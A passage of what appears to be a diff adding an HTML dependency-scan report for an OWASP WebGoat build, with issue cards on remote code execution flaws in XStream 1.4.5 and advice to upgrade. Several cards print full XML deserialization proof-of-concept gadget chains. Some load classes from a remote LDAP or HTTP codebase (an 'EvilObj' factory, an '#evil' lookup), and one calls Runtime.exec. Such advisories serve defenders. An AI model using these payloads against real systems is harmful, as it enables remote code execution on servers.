+  &lt;javax.swing.event.EventListenerList&gt;
+    &lt;default&gt;
+      &lt;listenerList&gt;
+        &lt;javax.swing.undo.UndoManager&gt;
+          &lt;hasBeenDone&gt;true&lt;/hasBeenDone&gt;
+          &lt;alive&gt;true&lt;/alive&gt;
+          &lt;inProgress&gt;true&lt;/inProgress&gt;
+          &lt;edits&gt;
+            &lt;com.sun.xml.internal.ws.api.message.Packet&gt;
+              &lt;message class=&#39;com.sun.xml.internal.ws.message.saaj.SAAJMessage&#39;&gt;
+                &lt;parsedMessage&gt;true&lt;/parsedMessage&gt;
+                &lt;soapVersion&gt;SOAP_11&lt;/soapVersion&gt;
+                &lt;bodyParts/&gt;
+                &lt;sm class=&#39;com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl&#39;&gt;
+                  &lt;attachmentsInitialized&gt;false&lt;/attachmentsInitialized&gt;
+                  &lt;multiPart class=&#39;com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart&#39;&gt;
+                    &lt;soapPart/&gt;
+                    &lt;mm&gt;
+                      &lt;it class=&#39;com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator&#39;&gt;
+                        &lt;aliases class=&#39;com.sun.jndi.ldap.LdapBindingEnumeration&#39;&gt;
+                          &lt;cleaned&gt;false&lt;/cleaned&gt;
+                          &lt;entries&gt;
+                            &lt;com.sun.jndi.ldap.LdapEntry&gt;
+                              &lt;DN&gt;cn=four,cn=three,cn=two,cn=one&lt;/DN&gt;
+                              &lt;attributes class=&#39;javax.naming.directory.BasicAttributes&#39; serialization=&#39;custom&#39;&gt;
+                                &lt;javax.naming.directory.BasicAttribute&gt;
+                                  &lt;default&gt;
+                                    &lt;ignoreCase&gt;false&lt;/ignoreCase&gt;
+                                  &lt;/default&gt;
+                                  &lt;int&gt;4&lt;/int&gt;
+                                  &lt;com.sun.jndi.ldap.LdapAttribute serialization=&#39;custom&#39;&gt;
+                                    &lt;javax.naming.directory.BasicAttribute&gt;
+                                      &lt;default&gt;
+                                        &lt;ordered&gt;false&lt;/ordered&gt;
+                                        &lt;attrID&gt;objectClass&lt;/attrID&gt;
+                                      &lt;/default&gt;
+                                      &lt;int&gt;1&lt;/int&gt;
+                                      &lt;string&gt;javanamingreference&lt;/string&gt;
+                                    &lt;/javax.naming.directory.BasicAttribute&gt;
+                                    &lt;com.sun.jndi.ldap.LdapAttribute&gt;
+                                      &lt;default&gt;
+                                        &lt;rdn class=&#39;com.sun.jndi.ldap.LdapName&#39; serialization=&#39;custom&#39;&gt;
+                                          &lt;com.sun.jndi.ldap.LdapName&gt;
+                                            &lt;string&gt;cn=four,cn=three,cn=two,cn=one&lt;/string&gt;
+                                            &lt;boolean&gt;false&lt;/boolean&gt;
+                                          &lt;/com.sun.jndi.ldap.LdapName&gt;
+                                        &lt;/rdn&gt;
+                                      &lt;/default&gt;
+                                    &lt;/com.sun.jndi.ldap.LdapAttribute&gt;
+                                  &lt;/com.sun.jndi.ldap.LdapAttribute&gt;
+                                  &lt;com.sun.jndi.ldap.LdapAttribute serialization=&#39;custom&#39;&gt;
+                                    &lt;javax.naming.directory.BasicAttribute&gt;
+                                      &lt;default&gt;
+                                        &lt;ordered&gt;false&lt;/ordered&gt;
+                                        &lt;attrID&gt;javaCodeBase&lt;/attrID&gt;
+                                      &lt;/default&gt;
+                                      &lt;int&gt;1&lt;/int&gt;
+                                      &lt;string&gt;http://127.0.0.1:8080/&lt;/string&gt;
+                                    &lt;/javax.naming.directory.BasicAttribute&gt;
+                                    &lt;com.sun.jndi.ldap.LdapAttribute&gt;
+                                      &lt;default/&gt;
+                                    &lt;/com.sun.jndi.ldap.LdapAttribute&gt;
+                                  &lt;/com.sun.jndi.ldap.LdapAttribute&gt;
+                                  &lt;com.sun.jndi.ldap.LdapAttribute serialization=&#39;custom&#39;&gt;
+                                    &lt;javax.naming.directory.BasicAttribute&gt;
+                                      &lt;default&gt;
+                                        &lt;ordered&gt;false&lt;/ordered&gt;
+                                        &lt;attrID&gt;javaClassName&lt;/attrID&gt;
+                                      &lt;/default&gt;
+                                      &lt;int&gt;1&lt;/
+</code></pre></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">455</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Arbitrary Code Execution</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569180</li>
+      <li class="card-meta-item">CWE-434</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;sorted-set&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;test&lt;/type&gt;
+    &lt;value class=&#39;javax.swing.MultiUIDefaults&#39; serialization=&#39;custom&#39;&gt;
+      &lt;unserializable-parents/&gt;
+      &lt;hashtable&gt;
+          &lt;default&gt;
+            &lt;loadFactor&gt;0.75&lt;/loadFactor&gt;
+            &lt;threshold&gt;525&lt;/threshold&gt;
+          &lt;/default&gt;
+          &lt;int&gt;700&lt;/int&gt;
+          &lt;int&gt;0&lt;/int&gt;
+      &lt;/hashtable&gt;
+      &lt;javax.swing.UIDefaults&gt;
+          &lt;default&gt;
+            &lt;defaultLocale&gt;zh_CN&lt;/defaultLocale&gt;
+            &lt;resourceCache/&gt;
+          &lt;/default&gt;
+      &lt;/javax.swing.UIDefaults&gt;
+      &lt;javax.swing.MultiUIDefaults&gt;
+          &lt;default&gt;
+            &lt;tables&gt;
+            &lt;javax.swing.UIDefaults serialization=&#39;custom&#39;&gt;
+              &lt;unserializable-parents/&gt;
+              &lt;hashtable&gt;
+                &lt;default&gt;
+                  &lt;loadFactor&gt;0.75&lt;/loadFactor&gt;
+                  &lt;threshold&gt;525&lt;/threshold&gt;
+                &lt;/default&gt;
+                &lt;int&gt;700&lt;/int&gt;
+                &lt;int&gt;1&lt;/int&gt;
+                &lt;string&gt;lazyValue&lt;/string&gt;
+                &lt;javax.swing.UIDefaults_-ProxyLazyValue&gt;
+                  &lt;className&gt;javax.naming.InitialContext&lt;/className&gt;
+                  &lt;methodName&gt;doLookup&lt;/methodName&gt;
+                  &lt;args&gt;
+                    &lt;string&gt;ldap://127.0.0.1:1389/#evil&lt;/string&gt;
+                  &lt;/args&gt;
+                &lt;/javax.swing.UIDefaults_-ProxyLazyValue&gt;
+              &lt;/hashtable&gt;
+              &lt;javax.swing.UIDefaults&gt;
+                &lt;default&gt;
+                  &lt;defaultLocale reference=&#39;../../../../../../../javax.swing.UIDefaults/default/defaultLocale&#39;/&gt;
+                  &lt;resourceCache/&gt;
+                &lt;/default&gt;
+              &lt;/javax.swing.UIDefaults&gt;
+            &lt;/javax.swing.UIDefaults&gt;
+            &lt;/tables&gt;
+          &lt;/default&gt;
+      &lt;/javax.swing.MultiUIDefaults&gt;
+    &lt;/value&gt;
+  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;test&lt;/type&gt;
+    &lt;value class=&#39;com.sun.org.apache.xpath.internal.objects.XString&#39;&gt;
+      &lt;m__obj class=&#39;string&#39;&gt;test&lt;/m__obj&gt;
+    &lt;/value&gt;
+  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+&lt;/sorted-set&gt;
+</code></pre><pre><code>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</code></pre><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.18 or higher.</p><h2>References</h2><ul><li><a href="https://x-stream.github.io/CVE-2021-39146.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li><li><a href="https://x-stream.github.io/changes.html#1.4.18" target="_blank" rel="noopener noreferrer">XStream Changelog</a></li><li><a href="https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39146.yaml" target="_blank" rel="noopener noreferrer">Nuclei Templates</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569180" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">275</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Arbitrary Code Execution</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181</li>
+      <li class="card-meta-item">CWE-434</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;sorted-set&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;ysomap&lt;/type&gt;
+    &lt;value class=&#39;com.sun.xml.internal.ws.api.message.Packet&#39; serialization=&#39;custom&#39;&gt;
+      &lt;message class=&#39;com.sun.xml.internal.ws.message.saaj.SAAJMessage&#39;&gt;
+        &lt;parsedMessage&gt;true&lt;/parsedMessage&gt;
+        &lt;soapVersion&gt;SOAP_11&lt;/soapVersion&gt;
+        &lt;bodyParts/&gt;
+        &lt;sm class=&#39;com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl&#39;&gt;
+          &lt;attachmentsInitialized&gt;false&lt;/attachmentsInitialized&gt;
+          &lt;multiPart class=&#39;com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart&#39;&gt;
+            &lt;soapPart/&gt;
+            &lt;mm&gt;
+              &lt;it class=&#39;com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator&#39;&gt;
+                &lt;aliases class=&#39;com.sun.jndi.toolkit.dir.ContextEnumerator&#39;&gt;
+                  &lt;children class=&#39;javax.naming.directory.BasicAttribute$ValuesEnumImpl&#39;&gt;
+                    &lt;list class=&#39;com.sun.xml.internal.dtdparser.SimpleHashtable&#39;&gt;
+                      &lt;current&gt;
+                        &lt;hash&gt;1&lt;/hash&gt;
+                        &lt;key class=&#39;javax.naming.Binding&#39;&gt;
+                          &lt;name&gt;ysomap&lt;/name&gt;
+                          &lt;isRel&gt;false&lt;/isRel&gt;
+                            &lt;boundObj class=&#39;com.sun.jndi.ldap.LdapReferralContext&#39;&gt;
+                              &lt;refCtx class=&#39;javax.naming.spi.ContinuationDirContext&#39;&gt;
+                                &lt;cpe&gt;
+                                  &lt;stackTrace/&gt;
+                                  &lt;suppressedExceptions class=&#39;java.util.Collections$UnmodifiableRandomAccessList&#39; resolves-to=&#39;java.util.Collections$UnmodifiableList&#39;&gt;
+                                    &lt;c class=&#39;list&#39;/&gt;
+                                    &lt;list reference=&#39;../c&#39;/&gt;
+                                  &lt;/suppressedExceptions&gt;
+                                  &lt;resolvedObj class=&#39;javax.naming.Reference&#39;&gt;
+                                    &lt;className&gt;EvilObj&lt;/className&gt;
+                                    &lt;addrs/&gt;
+                                    &lt;classFactory&gt;EvilObj&lt;/classFactory&gt;
+                                    &lt;classFactoryLocation&gt;http://127.0.0.1:1099/&lt;/classFactoryLocation&gt;
+                                  &lt;/resolvedObj&gt;
+                                  &lt;altName class=&#39;javax.naming.CompoundName&#39; serialization=&#39;custom&#39;&gt;
+                                    &lt;javax.naming.CompoundName&gt;
+                                      &lt;properties/&gt;
+                                      &lt;int&gt;1&lt;/int&gt;
+                                      &lt;string&gt;ysomap&lt;/string&gt;
+                                    &lt;/javax.naming.CompoundName&gt;
+                                  &lt;/altName&gt;
+                                &lt;/cpe&gt;
+                              &lt;/refCtx&gt;
+                              &lt;skipThisReferral&gt;false&lt;/skipThisReferral&gt;
+                              &lt;hopCount&gt;0&lt;/hopCount&gt;
+                            &lt;/boundObj&gt;
+                        &lt;/key&gt;
+                      &lt;/current&gt;
+                      &lt;currentBucket&gt;0&lt;/currentBucket&gt;
+                      &lt;count&gt;0&lt;/count&gt;
+                      &lt;threshold&gt;0&lt;/threshold&gt;
+                    &lt;/list&gt;
+                  &lt;/children&gt;
+                  &lt;currentReturned&gt;true&lt;/currentReturned&gt;
+                  &lt;currentChildExpanded&gt;false&lt;/currentChildExpanded&gt;
+                  &lt;rootProcessed&gt;true&lt;/rootProcessed&gt;
+                  &lt;scope&gt;2&lt;/scope&gt;
+                &lt;/aliases&gt;
+              &lt;/it&gt;
+            &lt;/mm&gt;
+          &lt;/multiPart&gt;
+        &lt;/sm&gt;
+      &lt;/message&gt;
+    &lt;/value&gt;
+  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;ysomap&lt;/type&gt;
+    &lt;value class=&#39;com.sun.org.apache.xpath.internal.objects.XString&#39;&gt;
+      &lt;m__obj class=&#39;string&#39;&gt;test&lt;/m__obj&gt;
+    &lt;/value&gt;
+  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+&lt;/sorted-set&gt;
+</code></pre><pre><code>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</code></pre><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.18 or higher.</p><h2>References</h2><ul><li><a href="https://x-stream.github.io/CVE-2021-39148.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li><li><a href="https://x-stream.github.io/changes.html#1.4.18" target="_blank" rel="noopener noreferrer">XStream Changelog</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">275</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Arbitrary Code Execution</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569182</li>
+      <li class="card-meta-item">CWE-434</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;sorted-set&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;ysomap&lt;/type&gt;
+    &lt;value class=&#39;com.sun.xml.internal.ws.api.message.Packet&#39; serialization=&#39;custom&#39;&gt;
+      &lt;message class=&#39;com.sun.xml.internal.ws.message.saaj.SAAJMessage&#39;&gt;
+        &lt;parsedMessage&gt;true&lt;/parsedMessage&gt;
+        &lt;soapVersion&gt;SOAP_11&lt;/soapVersion&gt;
+        &lt;bodyParts/&gt;
+        &lt;sm class=&#39;com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl&#39;&gt;
+          &lt;attachmentsInitialized&gt;false&lt;/attachmentsInitialized&gt;
+          &lt;multiPart class=&#39;com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart&#39;&gt;
+            &lt;soapPart/&gt;
+            &lt;mm&gt;
+              &lt;it class=&#39;com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator&#39;&gt;
+                &lt;aliases class=&#39;com.sun.jndi.ldap.LdapSearchEnumeration&#39;&gt;
+                  &lt;listArg class=&#39;javax.naming.CompoundName&#39; serialization=&#39;custom&#39;&gt;
+                    &lt;javax.naming.CompoundName&gt;
+                      &lt;properties/&gt;
+                      &lt;int&gt;1&lt;/int&gt;
+                      &lt;string&gt;ysomap&lt;/string&gt;
+                    &lt;/javax.naming.CompoundName&gt;
+                  &lt;/listArg&gt;
+                  &lt;cleaned&gt;false&lt;/cleaned&gt;
+                  &lt;res&gt;
+                    &lt;msgId&gt;0&lt;/msgId&gt;
+                    &lt;status&gt;0&lt;/status&gt;
+                  &lt;/res&gt;
+                  &lt;enumClnt&gt;
+                    &lt;isLdapv3&gt;false&lt;/isLdapv3&gt;
+                    &lt;referenceCount&gt;0&lt;/referenceCount&gt;
+                    &lt;pooled&gt;false&lt;/pooled&gt;
+                    &lt;authenticateCalled&gt;false&lt;/authenticateCalled&gt;
+                  &lt;/enumClnt&gt;
+                  &lt;limit&gt;1&lt;/limit&gt;
+                  &lt;posn&gt;0&lt;/posn&gt;
+                  &lt;homeCtx&gt;
+                    &lt;__contextType&gt;0&lt;/__contextType&gt;
+                    &lt;port__number&gt;1099&lt;/port__number&gt;
+                    &lt;hostname&gt;127.0.0.1&lt;/hostname&gt;
+                    &lt;clnt reference=&#39;../../enumClnt&#39;/&gt;
+                    &lt;handleReferrals&gt;0&lt;/handleReferrals&gt;
+                    &lt;hasLdapsScheme&gt;true&lt;/hasLdapsScheme&gt;
+                    &lt;netscapeSchemaBug&gt;false&lt;/netscapeSchemaBug&gt;
+                    &lt;referralHopLimit&gt;0&lt;/referralHopLimit&gt;
+                    &lt;batchSize&gt;0&lt;/batchSize&gt;
+                    &lt;deleteRDN&gt;false&lt;/deleteRDN&gt;
+                    &lt;typesOnly&gt;false&lt;/typesOnly&gt;
+                    &lt;derefAliases&gt;0&lt;/derefAliases&gt;
+                    &lt;addrEncodingSeparator/&gt;
+                    &lt;connectTimeout&gt;0&lt;/connectTimeout&gt;
+                    &lt;readTimeout&gt;0&lt;/readTimeout&gt;
+                    &lt;waitForReply&gt;false&lt;/waitForReply&gt;
+                    &lt;replyQueueSize&gt;0&lt;/replyQueueSize&gt;
+                    &lt;useSsl&gt;false&lt;/useSsl&gt;
+                    &lt;useDefaultPortNumber&gt;false&lt;/useDefaultPortNumber&gt;
+                    &lt;parentIsLdapCtx&gt;false&lt;/parentIsLdapCtx&gt;
+                    &lt;hopCount&gt;0&lt;/hopCount&gt;
+                    &lt;unsolicited&gt;false&lt;/unsolicited&gt;
+                    &lt;sharable&gt;false&lt;/sharable&gt;
+                    &lt;enumCount&gt;1&lt;/enumCount&gt;
+                    &lt;closeRequested&gt;false&lt;/closeRequested&gt;
+                  &lt;/homeCtx&gt;
+                  &lt;more&gt;true&lt;/more&gt;
+                  &lt;hasMoreCalled&gt;true&lt;/hasMoreCalled&gt;
+                  &lt;startName class=&#39;javax.naming.ldap.LdapName&#39; serialization=&#39;custom&#39;&gt;
+                    &lt;javax.naming.ldap.LdapName&gt;
+                      &lt;default/&gt;
+                      &lt;string&gt;uid=ysomap,ou=oa,dc=example,dc=com&lt;/string&gt;
+                    &lt;/javax.naming.ldap.LdapName&gt;
+                  &lt;/startName&gt;
+                  &lt;searchArgs&gt;
+                    &lt;name class=&#39;javax.naming.CompoundName&#39; reference=&#39;../../listArg&#39;/&gt;
+                    &lt;filter&gt;ysomap&lt;/filter&gt;
+                    &lt;cons&gt;
+                      &lt;searchScope&gt;1&lt;/searchScope&gt;
+                      &lt;timeLimit&gt;0&lt;/timeLimit&gt;
+                      &lt;derefLink&gt;false&lt;/derefLink&gt;
+                      &lt;returnObj&gt;true&lt;/returnObj&gt;
+                      &lt;countLimit&gt;0&lt;/countLimit&gt;
+                    &lt;/cons&gt;
+                    &lt;reqAttrs/&gt;
+                  &lt;/searchArgs&gt;
+                  &lt;entries&gt;
+                    &lt;com.sun.jndi.ldap.LdapEntry&gt;
+                      &lt;DN&gt;uid=songtao.xu,ou=oa,dc=example,dc=com&lt;/DN&gt;
+                      &lt;attributes class=&#39;javax.naming.directory.BasicAttributes&#39; serialization=&#39;custom&#39;&gt;
+                        &lt;default&gt;
+                          &lt;ignoreCase&gt;false&lt;/ignoreCase&gt;
+                        &lt;/default&gt;
+        
+</code></pre></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569182" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">866</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Remote Code Execution (RCE)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569183</li>
+      <li class="card-meta-item">CWE-94</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Remote Code Execution (RCE). This vulnerability may allow a remote attacker that has sufficient rights to execute commands on the host only by manipulating the processed input stream. No user is affected who followed the recommendation to set up XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 no longer uses a blacklist by default, since it cannot be secured for general purposes.</p><h2>PoC</h2><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;dynamic-proxy&gt;
+      &lt;interface&gt;java.lang.Comparable&lt;/interface&gt;
+      &lt;handler class=&#39;sun.tracing.NullProvider&#39;&gt;
+        &lt;active&gt;true&lt;/active&gt;
+        &lt;providerType&gt;java.lang.Comparable&lt;/providerType&gt;
+        &lt;probes&gt;
+          &lt;entry&gt;
+            &lt;method&gt;
+              &lt;class&gt;java.lang.Comparable&lt;/class&gt;
+              &lt;name&gt;compareTo&lt;/name&gt;
+              &lt;parameter-types&gt;
+                &lt;class&gt;java.lang.Object&lt;/class&gt;
+              &lt;/parameter-types&gt;
+            &lt;/method&gt;
+            &lt;sun.tracing.dtrace.DTraceProbe&gt;
+              &lt;proxy class=&#39;java.lang.Runtime&#39;/&gt;
+              &lt;implementing__method&gt;
+                &lt;class&gt;java.lang.Runtime&lt;/class&gt;
+                &lt;name&gt;exec&lt;/name&gt;
+                &lt;parameter-types&gt;
+                  &lt;class&gt;java.lang.String&lt;/class&gt;
+                &lt;/parameter-types&gt;
+              &lt;/implementing__method&gt;
+            &lt;/sun.tracing.dtrace.DTraceProbe&gt;
+          &lt;/entry&gt;
+        &lt;/probes&gt;
+      &lt;/handler&gt;
+    &lt;/dynamic-proxy&gt;
+    &lt;string&gt;calc&lt;/string&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><pre><code>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</code></pre><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.18 or higher.</p><h2>References</h2><ul><li><a href="https://x-stream.github.io/CVE-2021-39144.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li><li><a href="https://x-stream.github.io/changes.html#1.4.18" target="_blank" rel="noopener noreferrer">XStream Changelog</a></li><li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" target="_blank" rel="noopener noreferrer">CISA - Known Exploited Vulnerabilities</a></li><li><a href="https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39144.yaml" target="_blank" rel="noopener noreferrer">Nuclei Templates</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569183" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">275</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Arbitrary Code Execution</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569185</li>
+      <li class="card-meta-item">CWE-434</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;sorted-set&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;ysomap&lt;/type&gt;
+    &lt;value class=&#39;javax.swing.MultiUIDefaults&#39; serialization=&#39;custom&#39;&gt;
+      &lt;unserializable-parents/&gt;
+      &lt;hashtable&gt;
+        &lt;default&gt;
+          &lt;loadFactor&gt;0.75&lt;/loadFactor&gt;
+          &lt;threshold&gt;525&lt;/threshold&gt;
+        &lt;/default&gt;
+        &lt;int&gt;700&lt;/int&gt;
+        &lt;int&gt;0&lt;/int&gt;
+      &lt;/hashtable&gt;
+      &lt;javax.swing.UIDefaults&gt;
+        &lt;default&gt;
+          &lt;defaultLocale&gt;zh_CN&lt;/defaultLocale&gt;
+          &lt;resourceCache/&gt;
+        &lt;/default&gt;
+      &lt;/javax.swing.UIDefaults&gt;
+      &lt;javax.swing.MultiUIDefaults&gt;
+        &lt;default&gt;
+          &lt;tables&gt;
+            &lt;javax.swing.UIDefaults serialization=&#39;custom&#39;&gt;
